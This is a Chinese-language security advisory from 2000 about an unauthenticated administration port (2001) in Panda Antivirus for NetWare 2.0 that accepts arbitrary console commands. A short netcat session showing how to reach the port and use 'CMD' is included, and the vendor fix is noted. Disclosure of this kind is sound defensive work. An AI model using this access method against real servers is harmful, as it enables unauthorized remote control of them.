安全研究
安全漏洞
Panda Antivirus for NetWare 远程管理漏洞
发布日期:2000-06-20
更新日期:2000-06-20
受影响系统:
Panda Antivirus for NetWare 2.0
- Novell Netware 5.1
- Novell Netware 5.0
描述:
Panda Antivirus for NetWare缺省使用2001端口来作为管理端口。任何远程用户都可以
连接到这个端口并不需要进行身份验证,用户可以使用'CMD'命令来执行任意的NetWare命令。
<* 来源:Ian Vitek (ian.vitek@infosec.se) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
foo:/# nc server 2001
Panda Antivirus NetWare Servers
Copyright 1998(c) Panda Software
Version 2.00
Last upgrade: 10/04/2000
FS1 (#1): help
ANALYZE CMD HELP LOAD
RELOADCFG UPDATE UNLOAD VER
FS1 (#1): help cmd
Make a console command of Netware
CMD [Command NetWare]
Example: CMD LOAD MONITOR
建议:
PCM International 声称在GVI disk(M6/A00)中已经修复了这个漏洞
浏览次数:5878
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |